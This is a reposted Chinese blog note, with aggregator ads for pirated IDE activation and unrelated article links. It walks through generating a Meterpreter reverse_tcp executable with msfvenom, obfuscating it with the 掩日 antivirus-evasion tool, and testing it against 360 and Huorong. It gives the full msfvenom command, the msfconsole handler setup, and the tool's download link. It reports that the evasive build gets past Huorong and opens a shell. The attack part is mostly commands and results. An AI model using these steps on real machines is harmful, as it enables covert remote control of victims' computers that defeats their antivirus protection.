掩日免杀笔记_在线笔记

掩日免杀笔记_在线笔记微信公众号:乌鸦安全扫取二维码获取更多信息!1.环境攻击机:kalilinux10.211.55.23受害机:Windows10360主动防御Windows7火绒主动防御2.生成exe文件在kalilinux下使用msfvenom生成一个64位的exe文件msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=10.211.55.23lport=4444-fexe…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

掩日免杀笔记_在线笔记

 

 

1. 环境

攻击机: kali linux 10.211.55.23

受害机: Windows10 360主动防御

Windows7 火绒主动防御

 

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

 

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

 

掩日免杀笔记_在线笔记

 

将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

 

下载地址:

https://github.com/1y0n/av_evasion_tool/

 

将文件直接拖过来就行了

掩日免杀笔记_在线笔记

 

 

最后会生成一个YR_1.exe文件

掩日免杀笔记_在线笔记

 

 

将这两个文件分别压缩备份,发送到window10和window7上

 

掩日免杀笔记_在线笔记

 

3. 静态测试

打开各自的杀软进行测试

3.1 360

掩日免杀笔记_在线笔记

 

均报毒

3.2 火绒

掩日免杀笔记_在线笔记

 

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

 


msfconsole



use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

掩日免杀笔记_在线笔记

 

 

4.2 360下

4.2.1 1..exe

直接gg

掩日免杀笔记_在线笔记

 

4.2.2 免杀版1.exe

直接gg

掩日免杀笔记_在线笔记

4.3 火绒

4.3.1. 1.exe

gg

掩日免杀笔记_在线笔记

4.3.2 免杀版1.exe

上线正常

掩日免杀笔记_在线笔记

执行命令

掩日免杀笔记_在线笔记

5. 总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!?

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/171412.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • activiti7实战教程(一)集成用户系统

    activiti7实战教程(一)集成用户系统新建SpringBoot项目版本号2.6.3 <?xmlversion=”1.0″encoding=”UTF-8″?><projectxmlns=”http://maven.apache.org/POM/4.0.0″xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”xsi:schemaLocation=”http://maven.apache.org/POM/4.0.0https://maven.a

  • Java 流程控制

    Java 流程控制

  • intel AVX / AVX2指令学习资源

    intel AVX / AVX2指令学习资源IntelReferenceGuidesIntelIntrinsicsGuide一些解读

  • AV1编码技术分析

    AV1编码技术分析av1是一种新兴的开源、版权免费的视频压缩格式,由开放媒体联盟(AOMedia)行业联盟于2018年初联合开发并最终定稿。AV1开发的主要目标是在当前的编解码器基础上获得可观的压缩率提升,同时确保解码的复杂性和硬件的实际可行性。本文简要介绍了AV1中的关键编码技术,并与VP9和HEVC进行了初步的压缩性能比较。索引:视频压缩,AV1,开放媒体联盟,开源视频编码一、引言在过去的十年里,智能设备…

  • patch的用法_以的用法

    patch的用法_以的用法转载:http://shenze60.blog.163.com/blog/static/315747722009724113026896/首先介绍一下diff和patch。在这里不会把man在线文档上

  • Flask 让jsonify返回的json串支持中文显示

    Flask 让jsonify返回的json串支持中文显示用flask时遇到了返回字符串支持中文显示的问题,在web端显示的是utf-8的编码,而不是中文,如下图。虽然不影响接口的读取,但是可读性太差,于是研究了一下怎么直接显示成中文。最后找到了解决方案如下,在配置中加入下面一行代码就OK了。app.config[‘JSON_AS_ASCII’]=Falsejson.dumps()解决同样的问题可以加入ensure_ascii=False参考资料:

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号